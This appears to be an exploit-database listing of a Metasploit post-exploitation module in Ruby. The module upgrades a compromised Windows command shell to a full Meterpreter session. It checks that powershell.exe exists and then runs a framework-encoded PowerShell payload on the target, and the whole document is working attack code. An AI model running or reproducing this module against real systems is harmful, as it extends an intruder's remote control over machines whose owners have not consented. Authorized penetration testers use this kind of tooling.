Windows Command Shell Upgrade (Powershell)

2014.02.11
Credit: Ben Campbell
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  def initialize(info={})
    super(
      update_info(
        info,
        'Name'           => 'Windows Command Shell Upgrade (Powershell)',
        'Description'    => %q{
          This module executes Powershell to upgrade a Windows Shell session
          to a full Meterpreter session.
        },
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
        ],
        'DefaultOptions' => {
          'WfsDelay' => 10,
        },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'       => [ 'win' ],
        'SessionTypes'   => [ 'shell' ],
        'Targets'        => [ [ 'Universal', {} ] ],
        'DefaultTarget'  => 0
      ))
  end

  def exploit
    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"

    if file? "%WINDIR%\\System32#{psh_path}"
      print_status("Executing powershell command line...")
      cmd_exec(cmd_psh_payload(payload.encoded))
    else
      fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
    end
  end
end

